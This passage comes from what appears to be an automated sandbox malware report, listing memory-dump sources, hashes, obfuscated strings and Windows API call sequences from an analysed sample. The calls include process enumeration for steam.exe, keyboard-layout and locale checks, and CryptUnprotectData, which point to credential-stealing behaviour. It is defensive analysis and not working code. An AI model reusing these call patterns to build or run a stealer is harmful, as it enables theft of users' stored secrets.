                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                    • String ID: steam.exe
                                    • API String ID: 2284531361-2826358650
                                    • Opcode ID: cadb19d77590226a52254792d0b4e1093607f1f6f930dd0d7d5e655d6180508e
                                    • Instruction ID: 42f894ae8a0ab80148829fe62eb811a050f8b0047cf4341de1b3c30b35463cb8
                                    • Opcode Fuzzy Hash: cadb19d77590226a52254792d0b4e1093607f1f6f930dd0d7d5e655d6180508e
                                    • Instruction Fuzzy Hash: 9F018F716011285BE720DBE1DC49FFB77BCEB1A710F000195E90CD1150EFB49A95CBA0
                                    APIs
                                      • Part of subcall function 008E7210: lstrcpy.KERNEL32(00000000,ERROR), ref: 008E722E
                                    • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 008E2D3B
                                    • LocalAlloc.KERNEL32(00000040,00000000), ref: 008E2D4D
                                    • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 008E2D5A
                                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 008E2D8C
                                    • LocalFree.KERNEL32(00000000), ref: 008E2F6A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                    • String ID: /
                                    • API String ID: 3090951853-4001269591
                                    • Opcode ID: bb1a46529993f73be0170589fa0bf48fbd9121c5a69baa6d09a53a1f16963aa9
                                    • Instruction ID: b73468a0c537773b1c5e65f2314bc4d377078150d2bd669dbd04b180ed8dac83
                                    • Opcode Fuzzy Hash: bb1a46529993f73be0170589fa0bf48fbd9121c5a69baa6d09a53a1f16963aa9
                                    • Instruction Fuzzy Hash: 43B14A70900255CFC765CF99C948BA5B7F5FB46328F29C1A9E4099B3A2D7769C82CF80
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: az&$*dKw$E!;m$Kiw5$Ni?i$c%\q
                                    • API String ID: 0-3488330453
                                    • Opcode ID: 768c6758841d66ab729926a86987761bd4eaad20143f610fbb884483b65aec3d
                                    • Instruction ID: 235904a72bc36309bae7d2ee66dbed33f5ae42c50068ecf80c7c52c5b97afd82
                                    • Opcode Fuzzy Hash: 768c6758841d66ab729926a86987761bd4eaad20143f610fbb884483b65aec3d
                                    • Instruction Fuzzy Hash: 04B22FF360C2009FE704AE6DEC8567AB7EAEFD4720F16863DE6C4C7744EA3558058692
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 7 s$c+j{$pJjw${Xj}$8b$4
                                    • API String ID: 0-2819025870
                                    • Opcode ID: eeb9707f41c93ad57b430e9b399f700f84cf4cd3cc8f20183b70fd881c356c32
                                    • Instruction ID: e06163b525c7b5cf4c6fa1a7367fa5ad24245318b0963425f78726704b9ee5dc
                                    • Opcode Fuzzy Hash: eeb9707f41c93ad57b430e9b399f700f84cf4cd3cc8f20183b70fd881c356c32
                                    • Instruction Fuzzy Hash: DFB24AF360C2049FE3046E2DEC85A7BBBDAEFD4620F1A463EE6C4C3744E97558058696
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: %zj$1!wf$6!wt$^_$`qW:$gv%
                                    • API String ID: 0-2456203828
                                    • Opcode ID: db796c84c444a48c63d3f5baf0cfdd0e999a1217ebc658b19a1eeea0d3fd626d
                                    • Instruction ID: 7b728deb03f4e8f7090fc94ca6c95baf19bf439d9f28c6ca7c49f06bb1bfad3a
                                    • Opcode Fuzzy Hash: db796c84c444a48c63d3f5baf0cfdd0e999a1217ebc658b19a1eeea0d3fd626d
                                    • Instruction Fuzzy Hash: 66B2F6F360C2049FE304AE2DDC8567ABBE9EF94720F1A893DE6C4C7744E63598058697
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 008E2BE2
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008E2BE9
                                    • GetTimeZoneInformation.KERNEL32(?), ref: 008E2BF8
                                    • wsprintfA.USER32 ref: 008E2C23
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                    • String ID: wwww
                                    • API String ID: 3317088062-671953474
                                    • Opcode ID: 44c172d61ed2675ac74e8b848c42514d2293293dd5ba34be2bc67317570a77fc
                                    • Instruction ID: 13571c45146d31ca73f53cabd11069f1b9b5baf644ab601e97e287c08bc567eb
                                    • Opcode Fuzzy Hash: 44c172d61ed2675ac74e8b848c42514d2293293dd5ba34be2bc67317570a77fc
                                    • Instruction Fuzzy Hash: 9901F771A00604ABC718DFA8DC09F6ABB6DE785B20F104329F915D77C0DB7419008AD5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: !c}y$GISt$_$g;$-~u$x[l
                                    • API String ID: 0-359852747
                                    • Opcode ID: 18d0be9a8b54caa971a98a8d3a0e8b93af4e84442e40e126163f8ed59a242b3b
                                    • Instruction ID: 93e8b570535fd0489b2696a3e9b26f494aa61c88f39e9adff509e0d262969f9d
                                    • Opcode Fuzzy Hash: 18d0be9a8b54caa971a98a8d3a0e8b93af4e84442e40e126163f8ed59a242b3b
                                    • Instruction Fuzzy Hash: 3EB25CF3A0C2045FE304AE2DEC85A7BBBD9EF94320F16863DE9C5C3744E97558058696
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 008C769E
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 008C76A5
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 008C76CD
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 008C76ED
                                    • LocalFree.KERNEL32(?), ref: 008C76F7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                    • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: 3b42c1ad9c39508d1ebb3d3c78ef955a0e4cabefcc105d1a4ba1f4ce15bffbb1
                                    • Instruction ID: d6aa8f90d21bb68880bef4e8a92a01243334fb8c4e7cc5d5223efbc45d0d546e
                                    • Opcode Fuzzy Hash: 3b42c1ad9c39508d1ebb3d3c78ef955a0e4cabefcc105d1a4ba1f4ce15bffbb1
                                    • Instruction Fuzzy Hash: FA011E75B40308BFEB10DBD49C4AFAA7778EB44B15F104155FB09EB2C0DAB0A901CB94
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: #@7k$5=q$fZ?>$ydi{
                                    • API String ID: 0-2756908566
                                    • Opcode ID: 55e52ecbcf14d8ad390d672183024e042a0883e219f9adb32a503a5f34ce185c
                                    • Instruction ID: 4f6e0c5c18055fa1b04483d17c3c0e2401abe9ed4e3f2afbed339d4338b246f6
                                    • Opcode Fuzzy Hash: 55e52ecbcf14d8ad390d672183024e042a0883e219f9adb32a503a5f34ce185c
                                    • Instruction Fuzzy Hash: 63B239F3A0C2049FE304AE29EC8567AFBE9EB94720F1A493DE6C4C7744E53598058797
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: .I}$1G?:$MI3o$[`_
                                    • API String ID: 0-1823041945
                                    • Opcode ID: a6f5c6d2c59704f69f7f0c7c9473b719271de87386c2f0fe6fc6829bedc1efd0
                                    • Instruction ID: 0f4a9d5333c3fe030695733cf3c494b2c19820ac1efec85172aee98069edc7e8
                                    • Opcode Fuzzy Hash: a6f5c6d2c59704f69f7f0c7c9473b719271de87386c2f0fe6fc6829bedc1efd0
                                    • Instruction Fuzzy Hash: 86B219F360C2049FD3046E2DEC8567AFBEAEF94720F1A493DE6C5C3744EA3598058696
                                    APIs
                                      • Part of subcall function 008E7210: lstrcpy.KERNEL32(00000000,ERROR), ref: 008E722E
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008E3A36
                                    • Process32First.KERNEL32(00000000,00000128), ref: 008E3A49
                                    • Process32Next.KERNEL32(00000000,00000128), ref: 008E3A5F
                                      • Part of subcall function 008E7340: lstrlen.KERNEL32(------,008C5B1B), ref: 008E734B
                                      • Part of subcall function 008E7340: lstrcpy.KERNEL32(00000000), ref: 008E736F
                                      • Part of subcall function 008E7340: lstrcat.KERNEL32(?,------), ref: 008E7379
                                      • Part of subcall function 008E72B0: lstrcpy.KERNEL32(00000000), ref: 008E72DE
                                    • CloseHandle.KERNEL32(00000000), ref: 008E3B97
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: 645ef6f5e8e013109a54961f38f1f31825a50a4ef708f7c1a847602f3a7887b9
                                    • Instruction ID: 171a258ae9e2fbc3ea3d0464e0475741db21cf0982f5392be13d9eee2d2e70d7
                                    • Opcode Fuzzy Hash: 645ef6f5e8e013109a54961f38f1f31825a50a4ef708f7c1a847602f3a7887b9
                                    • Instruction Fuzzy Hash: B1810430904254CFC765CF5AD84CBA6B7B1FB85329F29C1A9D4099B3A2D7769D82CB40
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 008CEDD6
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 008CEDDE
                                    • lstrcat.KERNEL32(008ED014,008ED014), ref: 008CEE87
                                    • lstrcat.KERNEL32(008ED014,008ED014), ref: 008CEEA9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747287464.00000000008C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                     • Associated: 00000000.00000002.1747272761.00000000008C0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000956000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747287464.0000000000AF8000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747450411.0000000000B0A000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000C91000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D70000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DA3000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747467288.0000000000DB2000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747701539.0000000000DB3000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1747797295.0000000000F50000.00000040.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_8c0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: 8f755c9ff4c0fa90289ae01aa7ba7a074cebee0ce6970ae9fff9ba726e64b0a6
                                    • Instruction ID: a527a5bf26288be1c9bd211ae5bea5474c6d0deceb38592b22465c0b68aa3077
                                    • Opcode Fuzzy Hash: 8f755c9ff4c0fa90289ae01aa7ba7a074cebee0ce6970ae9fff9ba726e64b0a6
